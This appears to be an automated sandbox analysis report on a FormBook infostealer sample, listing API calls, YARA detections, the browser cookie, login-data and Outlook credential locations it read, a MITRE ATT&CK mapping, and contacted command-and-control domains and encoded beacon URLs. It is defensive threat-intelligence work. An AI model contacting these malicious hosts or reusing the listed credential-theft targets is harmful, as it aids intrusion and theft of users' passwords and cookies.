Source: SUMCVKBWRXks.exe, 00000005.00000000.2132255950.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, SUMCVKBWRXks.exe, 00000005.00000002.3553338472.00000000016B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_0079862B cpuid

0_2_0079862B

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007A4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_007A4E87

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007B1E06 GetUserNameW,

0_2_007B1E06

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007A3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_007A3F3A

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007749A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007749A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3552001637.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3553295403.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2211380258.00000000071D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2208574163.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553008112.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553656900.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3553342363.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2207975108.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\tzutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: gKvjKMCUfq.exe	Binary or memory string: WIN_81
Source: gKvjKMCUfq.exe	Binary or memory string: WIN_XP
Source: gKvjKMCUfq.exe	Binary or memory string: WIN_XPe
Source: gKvjKMCUfq.exe	Binary or memory string: WIN_VISTA
Source: gKvjKMCUfq.exe	Binary or memory string: WIN_7
Source: gKvjKMCUfq.exe	Binary or memory string: WIN_8
Source: gKvjKMCUfq.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3552001637.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3553295403.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2211380258.00000000071D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2208574163.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553008112.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553656900.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3553342363.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2207975108.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007E6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_007E6283
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007E6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_007E6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
gKvjKMCUfq.exe	69%	Virustotal		Browse
gKvjKMCUfq.exe	76%	ReversingLabs	Win32.Trojan.AutoitInject
gKvjKMCUfq.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.75178.club/q34f/	0%	Avira URL Cloud	safe
http://www.44ynh.top/l9wb/	100%	Avira URL Cloud	malware
http://www.supernutra01.online/q3v1/?Q4DT=n4tTOrYxhN7&blO4h0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs=	0%	Avira URL Cloud	safe
http://www.jijievo.site/521z/?blO4h0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&Q4DT=n4tTOrYxhN7	0%	Avira URL Cloud	safe
http://www.litespeedtech.com/error-page	0%	Avira URL Cloud	safe
https://kb.fastpanel.direct/troubleshoot/	0%	Avira URL Cloud	safe
http://www.taxitayninh365.site/syud/?blO4h0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&Q4DT=n4tTOrYxhN7	0%	Avira URL Cloud	safe
http://www.prestigerugz.info/m5si/?blO4h0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&Q4DT=n4tTOrYxhN7	0%	Avira URL Cloud	safe
http://www.ontherise.top/wr6c/?Q4DT=n4tTOrYxhN7&blO4h0=P2ZEIELZ0UPa04kWkm8Oh6lziqPRzY9FlTIQAlVGqe01bp+GVEKkI1C60uSAlmlZ1ff3ZHYqpSh2Ykr2aNLl88FB/CXa3uNADngpIC+4Qo6DpYBhb1F8NR4=	0%	Avira URL Cloud	safe
http://www.prestigerugz.info/m5si/	0%	Avira URL Cloud	safe
http://www.nb-shenshi.buzz	0%	Avira URL Cloud	safe
http://www.nb-shenshi.buzz/mz7t/	0%	Avira URL Cloud	safe
http://www.75178.club/q34f/?Q4DT=n4tTOrYxhN7&blO4h0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=	0%	Avira URL Cloud	safe
http://www.jijievo.site/521z/	0%	Avira URL Cloud	safe
http://www.ontherise.top/wr6c/	0%	Avira URL Cloud	safe
http://www.taxitayninh365.site/syud/	0%	Avira URL Cloud	safe
http://www.44ynh.top/l9wb/?Q4DT=n4tTOrYxhN7&blO4h0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
44ynh.top	38.181.21.178	true	true	unknown
all.wjscdn.com	154.205.156.26	true	false	high
www.prestigerugz.info	217.160.0.113	true	true	unknown
www.supernutra01.online	188.114.97.3	true	false	high
taxitayninh365.site	103.75.185.22	true	true	unknown
www.ontherise.top	162.0.213.94	true	true	unknown
gtml.huksa.huhusddfnsuegcdn.com	23.167.152.41	true	false	high
www.nb-shenshi.buzz	161.97.142.144	true	false	high
www.75178.club	unknown	unknown	false	high
www.setwayidiomas.online	unknown	unknown	false	unknown
www.jijievo.site	unknown	unknown	false	high
www.buckser.info	unknown	unknown	false	unknown
www.44ynh.top	unknown	unknown	false	unknown
www.taxitayninh365.site	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.44ynh.top/l9wb/	true	Avira URL Cloud: malware	unknown
http://www.75178.club/q34f/	true	Avira URL Cloud: safe	unknown
http://www.jijievo.site/521z/?blO4h0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&Q4DT=n4tTOrYxhN7	true	Avira URL Cloud: safe	unknown
http://www.ontherise.top/wr6c/?Q4DT=n4tTOrYxhN7&blO4h0=P2ZEIELZ0UPa04kWkm8Oh6lziqPRzY9FlTIQAlVGqe01bp+GVEKkI1C60uSAlmlZ1ff3ZHYqpSh2Ykr2aNLl88FB/CXa3uNADngpIC+4Qo6DpYBhb1F8NR4=	true	Avira URL Cloud: safe	unknown
http://www.supernutra01.online/q3v1/?Q4DT=n4tTOrYxhN7&blO4h0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs=	false	Avira URL Cloud: safe	unknown
http://www.prestigerugz.info/m5si/?blO4h0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&Q4DT=n4tTOrYxhN7	true	Avira URL Cloud: safe	unknown
http://www.prestigerugz.info/m5si/	true	Avira URL Cloud: safe	unknown
http://www.taxitayninh365.site/syud/?blO4h0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&Q4DT=n4tTOrYxhN7	true	Avira URL Cloud: safe	unknown
http://www.nb-shenshi.buzz/mz7t/	true	Avira URL Cloud: safe	unknown
http://www.ontherise.top/wr6c/	true	Avira URL Cloud: safe	unknown
http://www.75178.club/q34f/?Q4DT=n4tTOrYxhN7&blO4h0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=	true	Avira URL Cloud: safe	unknown
http://www.jijievo.site/521z/	true	Avira URL Cloud: safe	unknown
http://www.taxitayninh365.site/syud/	true	Avira URL Cloud: safe	unknown
http://www.44ynh.top/l9wb/?Q4DT=n4tTOrYxhN7&blO4h0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://kb.fastpanel.direct/troubleshoot/	SUMCVKBWRXks.exe, 00000005.00000002.3556655023.0000000005A64000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000004014000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3555385575.0000000006590000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2504404477.00000000212F4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.litespeedtech.com/error-page	SUMCVKBWRXks.exe, 00000005.00000002.3556655023.0000000006562000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000004B12000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.nb-shenshi.buzz	SUMCVKBWRXks.exe, 00000005.00000002.3553008112.0000000001292000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	SUMCVKBWRXks.exe, 00000005.00000002.3556655023.00000000066F4000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000004CA4000.00000004.10000000.00040000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.0.213.94	www.ontherise.top	Canada	35893	ACPCA	true
161.97.142.144	www.nb-shenshi.buzz	United States	51167	CONTABODE	false
188.114.97.3	www.supernutra01.online	European Union	13335	CLOUDFLARENETUS	false
217.160.0.113	www.prestigerugz.info	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
23.167.152.41	gtml.huksa.huhusddfnsuegcdn.com	Reserved	395774	ESVC-ASNUS	false
103.75.185.22	taxitayninh365.site	Viet Nam	63762	VNBOOKING-AS-VNVietNamBookingcorporationVN	true
154.205.156.26	all.wjscdn.com	Seychelles	26484	IKGUL-26484US	false
38.181.21.178	44ynh.top	United States	174	COGENT-174US	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588124
Start date and time:	2025-01-10 21:44:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gKvjKMCUfq.exe renamed because original name is a hash value
Original Sample Name:	f44c7d27b817a384705c841bc8baa0f14e2771f98711c68079f70980d5ef3362.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@10/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 50 Number of non-executed functions: 278
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.0.213.94	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	www.wintus.top/4woq/
	01152-11-12-24.exe	Get hash	malicious	FormBook	Browse	www.ontherise.top/wr6c/
	DRAFT COPY BL, CI & PL.exe	Get hash	malicious	FormBook	Browse	www.ontherise.top/wr6c/
	New Order.exe	Get hash	malicious	FormBook	Browse	www.inspireto.life/odi0/
	Price Inquiry.exe	Get hash	malicious	FormBook	Browse	www.oxilo.info/ve3g/
	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	www.oxilo.info/ve3g/
	PO #86637.exe	Get hash	malicious	FormBook	Browse	www.syvra.xyz/h2bb/
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	www.kryto.top/09dt/
	invoice.exe	Get hash	malicious	FormBook	Browse	www.syvra.xyz/h2bb/
	r9856_7.exe	Get hash	malicious	FormBook	Browse	www.zimra.xyz/knrh/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
all.wjscdn.com	aBEh0fsi2c.exe	Get hash	malicious	FormBook	Browse	154.90.58.209
	ORDER-401.exe	Get hash	malicious	FormBook	Browse	154.205.159.116
	01152-11-12-24.exe	Get hash	malicious	FormBook	Browse	154.90.58.209
	DRAFT COPY BL, CI & PL.exe	Get hash	malicious	FormBook	Browse	154.90.58.209
	New Order.exe	Get hash	malicious	FormBook	Browse	154.90.35.240
	TNT Express Delivery Consignment AWD 87993766479.vbs	Get hash	malicious	FormBook	Browse	38.54.112.227
	Payment-251124.exe	Get hash	malicious	FormBook	Browse	154.205.159.116
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	38.54.112.227
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	154.90.58.209

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	HGhGAjCVw5.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	104.21.80.1
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
ACPCA	http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3D	Get hash	malicious	Unknown	Browse	162.0.217.138
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	armv4l.elf	Get hash	malicious	Unknown	Browse	162.48.74.191
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	162.9.114.234
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	162.33.209.59
	5.elf	Get hash	malicious	Unknown	Browse	162.56.1.17
	miori.arm5.elf	Get hash	malicious	Unknown	Browse	162.1.10.7
	arm5.elf	Get hash	malicious	Mirai	Browse	162.32.170.30
	armv7l.elf	Get hash	malicious	Unknown	Browse	162.49.35.179
	31.13.224.14-x86-2025-01-03T22_14_18.elf	Get hash	malicious	Mirai	Browse	162.8.196.39
CONTABODE	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	173.249.62.84
	https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	173.249.62.84
	4sfN3Gx1vO.exe	Get hash	malicious	FormBook	Browse	161.97.142.144
	82eqjqLrzE.exe	Get hash	malicious	AsyncRAT	Browse	144.91.79.54
	DF2.exe	Get hash	malicious	Unknown	Browse	173.249.2.110
	Electrum-bch-4.4.2-x86_64.AppImage.elf	Get hash	malicious	Unknown	Browse	173.249.11.35
	bot.m68k.elf	Get hash	malicious	Mirai	Browse	95.212.118.93
	bot.mips.elf	Get hash	malicious	Mirai	Browse	95.212.118.77
